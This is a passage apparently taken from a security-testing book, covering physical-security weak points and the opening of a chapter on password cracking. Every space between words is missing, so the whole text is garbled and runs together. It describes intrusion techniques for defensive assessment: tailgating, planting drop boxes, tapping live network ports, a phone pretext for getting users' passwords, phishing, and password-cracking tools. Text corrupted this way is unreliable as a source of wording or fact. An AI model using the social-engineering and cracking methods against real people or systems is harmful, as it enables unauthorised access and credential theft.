Noreceptionistinabuildingtomonitorwho’scomingandgoingNovisitorsign-inorescortrequiredforbuildingaccessEmployeesoverlytrustingofvisitorsbecausetheywearvendoruniformsorsaythey’reinthebuildingtoworkonthecopierorcomputersNoaccesscontrolsondoorsortheuseoftraditionalkeysthatcanbeduplicatedwithnoaccountabilityDoorsproppedopenIP-basedvideo,accesscontrol,anddatacentermanagementsystemsaccessibleviathenetworkwithvendordefaultuserIDsandpasswordsPubliclyaccessiblecomputerroomsUnsecuredbackupmediasuchastapes,harddrives,andCDs/DVDsSensitiveinformationstoredinhard-copyformatlyingaroundcubiclesratherthanbeingstoredinlockingfilingcabinetsUnsecuredcomputerhardware,especiallyrouters,switches,andunencryptedlaptopsSensitiveinformationbeingthrownawayintrashcansratherthanbeingshreddedorplacedinashredcontainer

Whenthesephysicalsecurityvulnerabilitiesareuncovered,badthingscanhappen.Allittakestoexploittheseweaknessesisanunauthorizedindividualenteringyourbuilding.

PinpointingPhysicalVulnerabilitiesinYourOffice

Manypotentialphysicalsecurityexploitsseemunlikely,buttheycanoccurtoorganizationsthatdon’tpayattentiontophysicalsecurityrisks.Thebadguyscanexploitmanysuchvulnerabilities,includingweaknessesinabuilding’sinfrastructure,officelayout,computer-roomaccess,anddesign.Inadditiontothesefactors,considerthefacility’sproximitytolocalemergencyassistance(police,fire,andambulance)andthearea’scrimestatistics(burglary,breakingandentering,andsoon)soyoucanbetterunderstandwhatyou’reupagainst.

Lookforthevulnerabilitiesdiscussedinthefollowingsectionswhenassessingyourorganization’sphysicalsecurity.Thiswon’ttakealotoftechnicalsavvyorexpensiveequipment.Dependingonthesizeofyourofficeorfacilities,thesetestsshouldn’ttakemuchtimeeither.Thebottomlineistodeterminewhetherthephysicalsecuritycontrolsareadequategivenwhat’satstake.Aboveall,bepracticalandusecommonsense.

BuildinginfrastructureDoors,windows,andwallsarecriticalcomponentsofabuilding—especiallyforadatacenteroranareawhereconfidentialinformationisstored.

AttackpointsCriminalscanexploitahandfulofbuildinginfrastructurevulnerabilities.Considerthefollowingcommonlyoverlookedattackpoints:

Aredoorsproppedopen?Ifso,why?Cangapsatthebottomofcriticaldoorsallowsomeoneusingaballoonorotherdevicetotripasensorontheinsideofanotherwise“secure”room?Woulditbeeasytoforcedoorsopen?Asimplekicknearthedoorknobisusuallyenoughforstandarddoors.Whatisthebuildingordatacentermadeof(steel,wood,concrete),andhowsturdyarethewallsandentryways?Howresilientisthematerialtoearthquakes,tornadoes,strongwinds,heavyrains,andvehiclesdrivingintothebuilding?Wouldthesedisastersleavethebuildingexposedsothatlootersandotherswithmaliciousintentcouldgainaccesstothecomputerroomorothercriticalareas?Areanydoorsorwindowsmadeofglass?Isthisglassclear?Istheglassshatterprooforbulletproof?Dodoorhingesontheoutsidemakeiteasyforintruderstounhookthem?Aredoors,windows,andotherentrypointswiredtoanalarmsystem?Aretheredropceilingswithtilesthatcanbepushedup?Arethewallsslab-to-slab?

Ifnot,someonecouldeasilyscalewalls,bypassinganydoororwindowaccesscontrols.

CountermeasuresManyphysicalsecuritycountermeasuresforbuildingvulnerabilitiesmightrequireothermaintenance,construction,oroperationsexperts.Ifbuildinginfrastructureisnotyourforte,youcanhireoutsideexpertsduringthedesign,assessment,andretrofittingstagestoensurethatyouhaveadequatecontrols.Herearesomeofthebestwaystosolidifybuildingsecurity:

StrongdoorsandlocksWindowlesswallsarounddatacentersSignagethatmakesitclearwhat’swhereandwho’sallowedAcontinuouslymonitoredalarmsystemwithnetwork-basedcameraslocatedatallaccessareasLighting(especiallyaroundentryandexitpoints)MantrapsandsallyportsthatallowonlyonepersonatatimetopassthroughadoorFences(withbarbedwireorrazorwireifneeded)

UtilitiesYoumustconsiderbuildinganddatacenterutilities,suchaspower,water,generators,andfiresuppression,whenassessingphysicalsecurity.Theseutilitiescanhelpfightoffincidentsandkeepotheraccesscontrolsrunningduringapowerloss.Youhavetobecareful,though,astheycanalsobeusedagainstyouifanintruderentersthebuilding.

AttackpointsIntrudersoftenexploitutility-relatedvulnerabilities.Considerthefollowingattackpoints,whicharecommonlyoverlooked:

Ispower-protectionequipment(surgeprotectors,uninterruptiblepowersupplies[UPSs],andgenerators)inplace?Howeasily-accessiblearetheon/offswitchesonthesedevices?Cananintruderwalkinandflipaswitch?Cananintrudersimplyscaleawoodfenceorcutoffasimplelockandaccesscriticalequipment?Whenthepowerfails,whathappenstophysicalsecuritymechanisms?Dotheyfailopen,allowinganyonethrough,orfailclosed,keepingeveryoneinoroutuntilthepowerisrestored?Wherearefire-detectionand-suppressiondevices—includingalarmsensors,extinguishers,andsprinklersystems—located?Determinehowamaliciousintrudercanabusethem.Aretheyaccessibleviaawirelessorlocalnetworkwithdefaultlogincredentials?Perhapsthey’reaccessibleovertheInternet?Arethesedevicesplacedwheretheycanharmelectronicequipmentduringafalsealarm?

Wherearewaterandgasshutoffvalveslocated?Canyouaccessthem,orwouldyouhavetocallmaintenancepersonnelwhenanincidentarises?Arelocaltelecomwires(bothcopperandfiber)thatrunoutsideofthebuildinglocatedaboveground,wheresomeonecantapintothemwithtelecomtools?Candiggingintheareacutthemeasily?Aretheylocatedontelephonepolesthatarevulnerabletotrafficaccidentsorweather-relatedincidents?

CountermeasuresYoumightneedtoinvolveoutsideexpertsduringthedesign,assessment,orretrofittingstages.Thekeyisplacement:

Ensurethatmajorutilitycontrolsareplacedbehindclosedandlockabledoorsorfencedareasoutofsighttopeoplepassingthroughornearby.EnsurethatanydevicesaccessibleoverthenetworkorInternetaretestedusingvulnerabilityscannersandothertechniquesI’veoutlinedinthisbook.Iftheydon’thavetobenetwork-orInternet-accessible,disablethatfeatureorlimitwhocanaccessthesystemsviafirewallrulesoranetworkaccesscontrollist.Ensurethatsomeonewalkingthroughornearthebuildingcannotaccessthecontrolstoturnthemonandoff.

Securitycoversforon/offswitchesandthermostatcontrolsandlocksforserverpowerbuttons,USBports,andPCIexpansionslotscanbeeffectivedefenses.Justdon’tdependonthemfully,becausesomeonewithahammer(orstrongwill)caneasilycrackthemopen.

IonceassessedthephysicalsecurityofanInternetcolocationfacilityforaverylargecomputercompany.Imadeitpastthefrontguardandtailgatedthroughallthecontrolleddoorstoreachthedatacenter.AfterIwasinside,Iwalkedbyequipmentthatwasownedbyverylargecompanies,suchasservers,routers,firewalls,UPSs,andpowercords.Allthisequipmentwascompletelyexposedtoanyonewalkinginthatarea.Aquickflipofaswitchoranaccidentaltripoveranetworkcabledanglingtothefloorcouldbringanentireshelf—andaglobale-commercesystem—totheground.

OfficelayoutandusageOfficedesignandusagecaneitherhelporhinderphysicalsecurity.

AttackpointsIntruderscanexploitvariousweaknessesaroundtheoffice.Considertheseattackpoints:

Doesareceptionistorsecurityguardmonitortrafficinandoutofthemaindoorsof

thebuilding?Doemployeeshaveconfidentialinformationontheirdesks?Whataboutmailandotherpackages—dotheyliearoundoutsidesomeone’sdooror,evenworse,outsidethebuilding,waitingforpickup?

Wherearetrashcansanddumpsterslocated?Aretheyeasily-accessiblebyanyone?Arerecyclingbinsorshreddersused?

Openrecyclingbinsandothercarelesshandlingoftrashareinvitationsfordumpsterdiving.Peoplewithillintentoftensearchforconfidentialcompanyinformationandcustomerrecordsinthetrash—andthey’reoftenverysuccessful!Dumpsterdivingcanleadtomanysecurityexposures.

Howsecurearethemailandcopyrooms?Ifintruderscanaccesstheserooms,theycanstealmailorcompanyletterheadtouseagainstyou.Theycanalsouseandabuseyourfaxmachine(s),assumingyoustillhavethose!Areclosed-circuittelevision(CCTV)orIP-basednetworkcamerasusedandmonitoredinrealtime?Ifyoursetupislessproactiveandmoreas-needed,areyouconfidentthatyou’llbeabletoquicklyaccessvideosandrelatedlogswhenyouneedthem?Haveyournetworkcamerasanddigitalvideorecorders(DVRs)beenhardenedfromattack—oratleasthavethedefaultlogincredentialsbeenchanged?Thisisasecurityflawthatyoucanpredictwithnear100-percentcertaintyonpracticallyalltypesofnetworksfrompublicutilitycompaniestohospitalstomanufacturingcompaniesandalltypesofbusinessesinbetween.

Whataccesscontrolsareondoors?Areregularkeys,cardkeys,combinationlocks,orbiometricsused?Whocanaccessthesekeys,andwherearetheystored?

Keysandprogrammablekeypadcombinationsareoftensharedamongusers,makingaccountabilitydifficulttodetermine.Findouthowmanypeoplesharethesecombinationsandkeys.

Ioncecameacrossasituationforaclientwherethefrontlobbyentrancewasunmonitored.ItalsohappenedtohaveaVoiceoverIP(VoIP)phoneavailableforanyonetouse.Buttheclientdidnotconsiderthatanyonecouldenterthelobby,disconnecttheVoIPphone(orusethephone’sdataport),andplugalaptopcomputerintotheconnectionandhavefullaccesstothenetworkwithminimalchancethattheintruderwouldeverbequestionedaboutwhatheorshewasdoing.Thistypeofsituationiseasilypreventedbydisablingnetworkconnectionsinunmonitoredareas(ifseparatedataandvoiceportsareusedorifthevoiceanddatatraffichadbeenseparatedattheswitchorphysicalnetworklevels).

CountermeasuresWhat’schallengingaboutphysicalsecurityisthefactthatsecuritycontrolsareoftenreactive.Somecontrolsarepreventive(thatis,theydeter,detect,ordelay),butthey’re

notfoolproof.Puttingsimplemeasures,suchasthefollowing,inplacecanhelpreduceyourexposuretobuildingandoffice-relatedvulnerabilities:

Areceptionistorasecurityguardwhomonitorspeoplecomingandgoing.Thisisthesimplestcountermeasure.Thispersoncanensurethateveryvisitorsignsinandthatallneworuntrustedvisitorsarealwaysescorted.

Makeitpolicyandprocedureforallemployeestoquestionstrangersandreportstrangebehaviorinthebuilding.

EmployeesOnlyorAuthorizedPersonnelOnlysignsshowthebadguyswheretheyshouldgoinsteadofdeterringthemfromentering.It’ssecuritybyobscurity,butnotcallingattentiontothecriticalareasmaybethebestapproach.

Singleentryandexitpointstoadatacenter.Secureareasfordumpsters.CCTVorIP-basedvideocamerasformonitoringcriticalareas,includingdumpsters.Cross-cutshreddersorsecurerecyclingbinsforhard-copydocuments.

Limitednumbersofkeysandpasscodecombinationsusagethat’salsologgedandmonitored.

Makekeysandpasscodesuniqueforeachpersonwheneverpossibleor,betteryet,don’tusethematall.Useelectronicbadgesthatcanbebettercontrolledandmonitoredinstead.

Biometricsidentificationsystemscanbeveryeffective,buttheycanalsobeexpensiveanddifficulttomanage.

NetworkcomponentsandcomputersAfterintrudersobtainphysicalaccesstoabuilding,theymightlookfortheserverroomandothereasily-accessiblecomputerandnetworkdevices.

AttackpointsThekeystothekingdomareoftenascloseassomeone’sdesktopcomputerandnotmuchfartherthananunsecuredcomputerroomorwiringcloset.

Intruderscandothefollowing:

Obtainnetworkaccessandsendmaliciouse-mailsasalogged-inuser.CrackandobtainpasswordsdirectlyfromthecomputerbybootingitwithatoolsuchastheophcrackLiveCD(http://ophcrack.sourceforge.net).Icoverthis

http://ophcrack.sourceforge.net/

toolandmorepasswordhacksinChapter8.PlacepenetrationdropboxessuchasthosemadebyPwnieExpress(https://www.pwnieexpress.com)inastandardpoweroutlet.Thesedevicesallowamaliciousintrudertoconnectbackintothesystemviacellularconnectiontoperformtheirdirtydeeds.Thisisareallysneaky(spy-like)meansforintrusionthatyoucanuseaspartofyourownsecuritytesting.Stealfilesfromthecomputerbycopyingthemtoaremovablestoragedevice(suchasaphoneorUSBdrive)orbye-mailingthemtoanexternaladdress.Enterunlockedcomputerroomsandmessaroundwithservers,firewalls,androuters.Walkoutwithnetworkdiagrams,contactlists,anddisasterrecoveryplans.ObtainphonenumbersfromanaloglinesandcircuitIDsfromT1,MetroEthernet,andothertelecomequipmenttouseinsubsequentattacks.

Practicallyeverybitofunencryptedinformationthattraversesthenetworkcanberecordedforfutureanalysisthroughoneofthefollowingmethods:

Connectingacomputerrunningnetworkanalyzersoftware(includingatoolsuchasCainandAbelwhichIcoverinChapter9)toaswitchonyournetwork.

Installingnetworkanalyzersoftwareonanexistingcomputer.

Anetworkanalyzerisveryhardtospot.IcovernetworkanalyzerscapturingpacketsonswitchedEthernetnetworksinmoredetailinChapter9.

Howwouldsomeoneaccessorusethisinformationinthefuture?

Theeasiestattackmethodistoinstallremote-administrationsoftwareonthecomputer,suchasVNC(www.realvnc.com).AcraftyhackerwithenoughtimecanbindapublicIPaddresstothecomputerifthecomputerisoutsidethefirewall.Hackersormaliciousinsiderswithenoughnetworkknowledge(andtime)canconfigurenewfirewallrulestodothis.

Also,considertheseotherphysicalvulnerabilities:

Howeasilycancomputersbeaccessedduringregularbusinesshours?Duringlunchtime?Afterhours?Arecomputers—especiallylaptops—securedtodeskswithlocks?Aretheirharddrivesencryptedintheeventoneislostorstolen?Dotheirscreenslockafterashortperiodofnon-use?Doemployeestypicallyleavetheirphonesandtabletslyingaroundunsecured?Whataboutwhenthey’retravelingorworkingfromhome,hotels,orthelocal

https://www.pwnieexpress.com

http://www.realvnc.com/

coffeeshop?Arepasswordsstoredonstickynotesoncomputerscreens,keyboards,ordesks?Thisisalong-runningjokeinourcirclesbutitstillhappens!Arebackupmedialyingaroundtheofficeordatacentersusceptibletotheft?

Aresafesusedtoprotectbackupmedia?Aretheyspecificallyratedformediatokeepbackupsfrommeltingduringafire?Whocanaccessthesafe?

Safesareoftenatgreatriskbecauseoftheirsizeandvalue.Also,theyaretypicallyunprotectedbytheorganization’sregularsecuritycontrols.Arespecificpoliciesandtechnologiesinplacetohelpprotectthem?Arelockinglaptopbagsrequired?Whataboutpower-onpasswords?Encryptioncansolvealotofphysicalsecurity-relatedweaknesses.

Howeasilycansomeoneconnecttoawirelessaccesspoint(AP)signalortheAPitselftojointhenetwork?Rogueaccesspointsarealsosomethingtoconsider.IcoverwirelessnetworksinmoredetailinChapter10.Arenetworkfirewalls,routers,switches,andhubs(basically,anythingwithanEthernetconnection)easilyaccessible,whichwouldenableanattackertoplugintothenetworkeasily?

AreallcablespatchedthroughonthepatchpanelinthewiringclosetsoallnetworkdropsareliveasinthecaseoftheunmonitoredlobbyareaImentionearlier?

Thisset-upisverycommonbutabadideabecauseitallowsanyonetoplugintothenetworkanywhereandgainaccess.Thisisnotonlyagreatwaytoallowintrudersontoyournetworkbutitcanalsobeusedasameansforspreadingmalware.

CountermeasuresNetworkandcomputersecuritycountermeasuresaresomeofthesimplesttoimplementyetthemostdifficulttoenforcebecausetheyinvolvepeopleandtheireverydayactions.Here’sarundownofthesecountermeasures:

Makeyourusersawareofwhattolookoutforsoyouhaveextrasetsofeyesandearshelpingyouout.Requireuserstolocktheirscreens—whichonlytakesafewclicksorkeystrokes—whentheyleavetheircomputers.Ensurethatstrongpasswordsareused.IcoverthistopicinChapter8.Requirelaptopuserstolocktheirsystemstotheirdeskswithalockingcable.Thisisespeciallyimportantforremoteworkersandtravelersaswellasinlargercompaniesorlocationsthatreceivealotoffoottraffic.

Requirealllaptopstousefulldiskencryptiontechnologies,suchasBitLockerinWindows(ideallycombinedwithitscentralmanagementsoftwarecalledMicrosoftBitLockerAdministrationandMonitoringthatcanbefoundathttps://technet.microsoft.com/en-us/windows/hh826072.aspx)andWinMagicSecureDocFullDiskEncryption(www.winmagic.com/products/securedoc-full-disk-encryption).Keepserverroomsandwiringclosetslockedandmonitorthoseareasforanywrongdoing.Keepacurrentinventoryofhardwareandsoftwarewithintheorganizationsoit’seasytodeterminewhenextraequipmentappearsorwhenequipmentismissing.Thisisespeciallyimportantincomputerrooms.Properlysecurecomputermediawhenstoredandduringtransport.Scanforroguewirelessaccesspoints.Usecabletrapsandlocksthatpreventintrudersfromunpluggingnetworkcablesfrompatchpanelsorcomputersandusingthoseconnectionsfortheirowncomputers.Useabulkeraseronmagneticmediabeforethey’rediscarded.

https://technet.microsoft.com/en-us/windows/hh826072.aspx

http://www.winmagic.com/products/securedoc-full-disk-encryption/

Chapter8

PasswordsInThisChapter

Identifyingpasswordvulnerabilities

Examiningpassword-hackingtoolsandtechniques

Hackingoperatingsystempasswords

Hackingpassword-protectedfiles

Protectingyoursystemsfrompasswordhacking

Passwordhackingisoneoftheeasiestandmostcommonwaysattackersobtainunauthorizednetwork,computer,orapplicationaccess.Youoftenhearaboutitintheheadlines,andstudyafterstudysuchastheVerizonDataBreachInvestigationsReportreaffirmsthatweakpasswordsareattherootofmanysecurityproblems.IhavetroublewrappingmyheadaroundthefactthatI’mstilltalkingabout(andbusinessesaresufferingfrom)weakpasswords,butit’sareality—and,asaninformationsecuritytestingprofessional,youcancertainlydoyourparttominimizetherisks.

Althoughstrongpasswords—ideally,longerandstrongerpassphrasesthataredifficulttocrack(orguess)—areeasytocreateandmaintain,networkadministratorsandusersoftenneglectthis.Therefore,passwordsareoneoftheweakestlinksintheinformationsecuritychain.Passwordsrelyonsecrecy.Afterapasswordiscompromised,itsoriginalownerisn’ttheonlypersonwhocanaccessthesystemwithit.That’swhenaccountabilitygoesoutthewindowandbadthingsstarthappening.

Externalattackersandmaliciousinsidershavemanywaystoobtainpasswords.Theycangleanpasswordssimplybyaskingforthemorbylookingovertheshouldersofusers(shouldersurfing)whiletheytypetheirpasswords.Hackerscanalsoobtainpasswordsfromlocalcomputersbyusingpassword-crackingsoftware.Toobtainpasswordsfromacrossanetwork,attackerscanuseremotecrackingutilities,keyloggers,ornetworkanalyzers.

Thischapterdemonstrateshoweasilythebadguyscangatherpasswordinformationfromyournetworkandcomputersystems.Ioutlinecommonpasswordvulnerabilitiesanddescribecountermeasurestohelppreventthesevulnerabilitiesfrombeingexploitedonyoursystems.Ifyouperformthetestsandimplementthecountermeasuresoutlinedinthischapter,you’llbewellonyourwaytosecuringyoursystems’passwords.

UnderstandingPasswordVulnerabilitiesWhenyoubalancethecostofsecurityandthevalueoftheprotectedinformation,thecombinationofauserIDandasecretpasswordisusuallyadequate.However,passwordsgiveafalsesenseofsecurity.Thebadguysknowthisandattempttocrackpasswordsasasteptowardbreakingintocomputersystems.

Onebigproblemwithrelyingsolelyonpasswordsforsecurityisthatmorethanonepersoncanknowthem.Sometimes,thisisintentional;often,it’snot.Thetoughpartisthatthere’snowayofknowingwho,besidesthepassword’sowner,knowsapassword.

Rememberthatknowingapassworddoesn’tmakesomeoneanauthorizeduser.

Herearethetwogeneraltypesofpasswordvulnerabilities:

Organizationaloruservulnerabilities:Thisincludeslackofpasswordpoliciesthatareenforcedwithintheorganizationandlackofsecurityawarenessonthepartofusers.Technicalvulnerabilities:Thisincludesweakencryptionmethodsandunsecurestorageofpasswordsoncomputersystems.

Iexploreeachoftheseclassificationsinmoredetailinthefollowingsections.

BeforecomputernetworksandtheInternet,theuser’sphysicalenvironmentwasanadditionallayerofpasswordsecuritythatactuallyworkedprettywell.Nowthatmostcomputershavenetworkconnectivity,thatprotectionisgone.RefertoChapter7fordetailsonmanagingphysicalsecurityinthisageofnetworkedcomputersandmobiledevices.

OrganizationalpasswordvulnerabilitiesIt’shumannaturetowantconvenience,especiallywhenitcomestorememberingfive,ten,andoftendozensofpasswordsforworkanddailylife.Thisdesireforconveniencemakespasswordsoneoftheeasiestbarriersforanattackertoovercome.Almost3trillion(yes,trillionwithatand12zeros)eight-characterpasswordcombinationsarepossiblebyusingthe26lettersofthealphabetandthenumerals0through9.Thekeystostrongpasswordsare:1)easytorememberand2)difficulttocrack.However,mostpeoplejustfocusontheeasy-to-rememberpart.Usersliketousesuchpasswordsaspassword,theirloginname,abc123,ornopasswordatall!Don’tlaugh;I’veseentheseblatantweaknessesandguaranteethey’reonanygivennetworkthisverymoment.

Unlessusersareeducatedandremindedaboutusingstrongpasswords,theirpasswordsusuallyare

Easytoguess.

Seldomchanged.

Reusedformanysecuritypoints.Whenbadguyscrackonepassword,theycanoftenaccessothersystemswiththatsamepasswordandusername.

Usingthesamepasswordacrossmultiplesystemsandwebsitesisnothingbutabreachwaitingtohappen.Everyoneisguiltyofit,butthatdoesn’tmakeitright.Dowhatyoucantoprotectyourowncredentialsandspreadthewordtoyourusersabouthowthispracticecangetyouintoarealbind.

Writtendowninunsecureplaces.Generally,themorecomplexapasswordis,themoredifficultitistocrack.However,whenuserscreatecomplexpasswords,they’remorelikelytowritethemdown.Externalattackersandmaliciousinsiderscanfindthesepasswordsandusethemagainstyouandyourbusiness.

TechnicalpasswordvulnerabilitiesYoucanoftenfindtheseserioustechnicalvulnerabilitiesafterexploitingorganizationalpasswordvulnerabilities:

Weakpasswordencryptionschemes.HackerscanbreakweakpasswordstoragemechanismsbyusingcrackingmethodsthatIoutlineinthischapter.Manyvendorsanddevelopersbelievethatpasswordsaresafeaslongastheydon’tpublishthesourcecodefortheirencryptionalgorithms.Wrong!Apersistent,patientattackercanusuallycrackthissecuritybyobscurity(asecuritymeasurethat’shiddenfromplainviewbutcanbeeasilyovercome)fairlyquickly.Afterthecodeiscracked,itisdistributedacrosstheInternetandbecomespublicknowledge.

Passwordcrackingutilitiestakeadvantageofweakpasswordencryption.Theseutilitiesdothegruntworkandcancrackanypassword,givenenoughtimeandcomputingpower.

Programsthatstoretheirpasswordsinmemory,unsecuredfiles,andeasilyaccesseddatabases.Unencrypteddatabasesthatprovidedirectaccesstosensitiveinformationtoanyonewithdatabaseaccess,regardlessofwhethertheyhaveabusinessneedtoknow.Userapplicationsthatdisplaypasswordsonthescreenwhiletheuseristyping.

TheNationalVulnerabilityDatabase(anindexofcomputervulnerabilitiesmanagedbytheNationalInstituteofStandardsandTechnology)currentlyidentifiesover2,300password-relatedvulnerabilities!Youcansearchfortheseissuesathttp://nvd.nist.govtofindouthowvulnerablesomeofyoursystemsarefromatechnicalperspective.

http://nvd.nist.gov

CrackingPasswordsPasswordcrackingisoneofthemostenjoyablehacksforthebadguys.Itfuelstheirsenseofexplorationanddesiretofigureoutaproblem.Youmightnothaveaburningdesiretoexploreeveryone’spasswords,butithelpstoapproachpasswordcrackingwiththismindset.Sowhereshouldyoustarttestingthepasswordsonyoursystems?Generally,anyuser’spasswordworks.Afteryouobtainonepassword,youcanoftenobtainothers—includingadministratororrootpasswords.

Administratorpasswordsarethepotofgold.Withunauthorizedadministrativeaccess,you(oracriminalhacker)candovirtuallyanythingonthesystem.Whenlookingforyourorganization’spasswordvulnerabilities,Irecommendfirsttryingtoobtainthehighestlevelofaccesspossible(suchasadministrator)throughthemostdiscreetmethodpossible.That’softenwhatthecriminalsdo.

Youcanuselow-techwaysandhigh-techwaystoexploitvulnerabilitiestoobtainpasswords.Forexample,youcandeceiveusersintodivulgingpasswordsoverthetelephoneorsimplyobservewhatauserhaswrittendownonapieceofpaper.Oryoucancapturepasswordsdirectlyfromacomputer,overanetwork,andviatheInternetwiththetoolscoveredinthefollowingsections.

Crackingpasswordstheold-fashionedwayAhackercanuselow-techmethodstocrackpasswords.Thesemethodsincludeusingsocialengineeringtechniquessuchasphishing,shouldersurfing,andsimplyguessingpasswordsfrominformationthatheknowsabouttheuser.

SocialengineeringThemostpopularlow-techmethodforgatheringpasswordsissocialengineering,whichIcoverindetailinChapter6.Socialengineeringtakesadvantageofthetrustingnatureofhumanbeingstogaininformationthatlatercanbeusedmaliciously.Acommonsocialengineeringtechniqueissimplytoconpeopleintodivulgingtheirpasswords.Itsoundsridiculous,butithappensallthetime.

Techniques

Toobtainapasswordthroughsocialengineering,youjustaskforit.Forexample,youcansimplycallauserandtellhimthathehassomeimportant-lookinge-mailsstuckinthemailqueue,andyouneedhispasswordtologinandfreethemup.Thisisoftenhowhackersandrogueinsiderstrytogettheinformation!

Anotherwaytogetuserstodivulgetheirpasswordsistosendaphishinge-mailsimplyrequestingthatinformation.Ihavefoundthataskinguserstoconfirmtheirunderstandingandcompliancewithinternalsecuritypoliciesbysubmittingtheirlogincredentialstoaphishingwebsiteisallittakes.Icovere-mailphishingingreaterdetailinChapter6.

Ifusersgiveyoutheirpasswordsduringyourtesting,makesurethatthosepasswordsarechanged.AneasywaytodothisistoforcepasswordchangesforallusersthroughtheWindowsdomain.Youdon’twanttobeheldaccountableifsomethinggoesawryafterthepasswordhasbeendisclosed.

Acommonweaknessthatcanfacilitatesuchsocialengineeringiswhenstaffmembers’names,phonenumbers,ande-mailaddressesarepostedonyourcompanywebsite.SocialmediasitessuchasLinkedIn,Facebook,andTwittercanalsobeusedagainstacompanybecausethesesitescanrevealemployees’namesandcontactinformation.

Countermeasures

Userawarenessandconsistentsecuritytrainingaregreatdefensesagainstsocialengineering.Securitytoolsareagoodfail-safeiftheymonitorforsuche-mailsandwebbrowsingatthehost-level,networkperimeter,orinthecloud.Trainuserstospotattacks(suchassuspiciousphonecallsordeceitfulphishinge-mails)andrespondeffectively.Theirbestresponseisnottogiveoutanyinformationandtoalerttheappropriateinformationsecuritymanagerintheorganizationtoseewhethertheinquiryislegitimateandwhetheraresponseisnecessary.Oh,andtakethatstaffdirectoryoffyourwebsiteoratleastremoveITstaffmembers’information.

ShouldersurfingShouldersurfing(theactoflookingoversomeone’sshouldertoseewhatthepersonistyping)isaneffective,low-techpasswordhack.

Techniques

Tomountthisattack,thebadguysmustbeneartheirvictimsandnotlookobvious.Theysimplycollectthepasswordbywatchingeithertheuser’skeyboardorscreenwhenthepersonlogsin.Anattackerwithagoodeyemightevenwatchwhethertheuserisglancingaroundhisdeskforeitherareminderofthepasswordorthepassworditself.Securitycamerasorawebcamcanevenbeusedforsuchattacks.Coffeeshopsandairplanesprovidetheidealscenariosforshouldersurfing.

Youcantryshouldersurfingyourself.Simplywalkaroundtheofficeandperformrandomspotchecks.Gotousers’desksandaskthemtologintotheircomputers,thenetwork,oreventheire-mailapplications.Justdon’ttellthemwhatyou’redoingbeforehand,ortheymightattempttohidewhatthey’retypingorwherethey’relookingfortheirpassword—twothingsthattheyshould’vebeendoingallalong!Justbecarefuldoingthisandrespectotherpeople’sprivacy.

Countermeasures

Encourageuserstobeawareoftheirsurroundingsandnottoentertheirpasswordswhentheysuspectthatsomeoneislookingovertheirshoulders.Instructusersthatiftheysuspectsomeoneislookingovertheirshoulderswhilethey’reloggingin,theyshouldpolitelyaskthepersontolookawayor,whennecessary,hurlanappropriate

epithettoshowtheoffenderthattheuserisserious.It’softeneasiesttojustleanintotheshouldersurfer’slineofsighttokeepthemfromseeinganytypingand/orthecomputerscreen.3MPrivacyFilters(www.shop3m.com/3m-privacy-filters.html)workgreataswellyet,surprisingly,Irarelyseethembeingused.

InferenceInferenceissimplyguessingpasswordsfrominformationyouknowaboutusers—suchastheirdateofbirth,favoritetelevisionshow,orphonenumbers.Itsoundssilly,butcriminalsoftendeterminetheirvictims’passwordssimplybyguessingthem!

Thebestdefenseagainstaninferenceattackistoeducateusersaboutcreatingsecurepasswordsthatdon’tincludeinformationthatcanbeassociatedwiththem.Outsideofcertainpasswordcomplexityfilters,it’softennoteasytoenforcethispracticewithtechnicalcontrols.So,youneedasoundsecuritypolicyandongoingsecurityawarenessandtrainingtoremindusersoftheimportanceofsecurepasswordcreation.

WeakauthenticationExternalattackersandmaliciousinsiderscanobtain—orsimplyavoidhavingtouse—passwordsbytakingadvantageofolderorunsecuredoperatingsystemsthatdon’trequirepasswordstologin.Thesamegoesforaphoneortabletthatisn’tconfiguredtousepasswords.

Bypassingauthentication

Onolderoperatingsystems(suchasWindows9x)thatpromptforapassword,youcanpressEsconthekeyboardtogetrightin.Okay,it’shardtofindanyWindows9xsystemsthesedays,butthesamegoesforanyoperatingsystem—oldornew—that’sconfiguredtobypasstheloginscreen.Afteryou’rein,youcanfindotherpasswordsstoredinsuchplacesasdialupandVPNconnectionsandscreensavers.SuchpasswordscanbecrackedveryeasilyusingElcomSoft’sProactiveSystemPasswordRecoverytool(www.elcomsoft.com/pspr.html)andCain&Abel(www.oxid.it/cain.html).Theseweaksystemscanserveastrustedmachines—meaningthatpeopleassumethey’resecure—andprovidegoodlaunchingpadsfornetwork-basedpasswordattacksaswell.

Countermeasures

Theonlytruedefenseagainstweakauthenticationistoensureyouroperatingsystemsrequireapassworduponboot.Toeliminatethisvulnerability,atleastupgradetoWindows7,ifnotWindows10,orusethemostrecentversionsofLinuxoroneofthevariousflavorsofUNIX,includingMacOSXandChromeOS.

Currentauthenticationsystems,suchasKerberos(whichisusedinnewerversionsofWindows)anddirectoryservices(suchasMicrosoft’sActiveDirectory),encryptuserpasswordsordon’tcommunicatethepasswordsacrossthenetworkatall,whichcreatesanextralayerofsecurity.

http://www.shop3m.com/3m-privacy-filters.html

http://www.elcomsoft.com/pspr.html

http://www.oxid.it/cain.html

Crackingpasswordswithhigh-techtoolsHigh-techpasswordcrackinginvolvesusingaprogramthattriestoguessapasswordbydeterminingallpossiblepasswordcombinations.Thesehigh-techmethodsaremostlyautomatedafteryouaccessthecomputerandpassworddatabasefiles.

Themainpassword-crackingmethodsaredictionaryattacks,brute-forceattacks,andrainbowattacks.Youfindouthoweachoftheseworkinthefollowingsections.

Password-crackingsoftwareYoucantrytocrackyourorganization’soperatingsystemandapplicationpasswordswithvariouspassword-crackingtools:

Brutus(www.hoobie.net/brutus)crackslogonsforHTTP,FTP,telnet,andmore.Cain&Abel(www.oxid.it/cain.html)cracksLMandNTLanManager(NTLM)hashes,WindowsRDPpasswords,CiscoIOSandPIXhashes,VNCpasswords,RADIUShashes,andlotsmore.(Hashesarecryptographicrepresentationsofpasswords.)ElcomSoftDistributedPasswordRecovery(www.elcomsoft.com/edpr.html)cracksWindows,MicrosoftOffice,PGP,Adobe,iTunes,andnumerousotherpasswordsinadistributedfashionusingupto10,000networkedcomputersatonetime.Plus,thistoolusesthesamegraphicsprocessingunit(GPU)videoaccelerationastheElcomSoftWirelessAuditortool,whichallowsforcrackingspeedsupto50timesfaster.(ItalkabouttheElcomSoftWirelessAuditortoolinChapter10.)ElcomSoftSystemRecovery(www.elcomsoft.com/esr.html)cracksorresetsWindowsuserpasswords,setsadministrativerights,andresetspasswordexpirationsallfromabootableCD.Thisisagreattoolfordemonstratingwhatcanhappenwhenlaptopcomputersdonothavefulldiskencryption.JohntheRipper(www.openwall.com/john)crackshashedLinux/UNIXandWindowspasswords.ophcrack(http://ophcrack.sourceforge.net)cracksW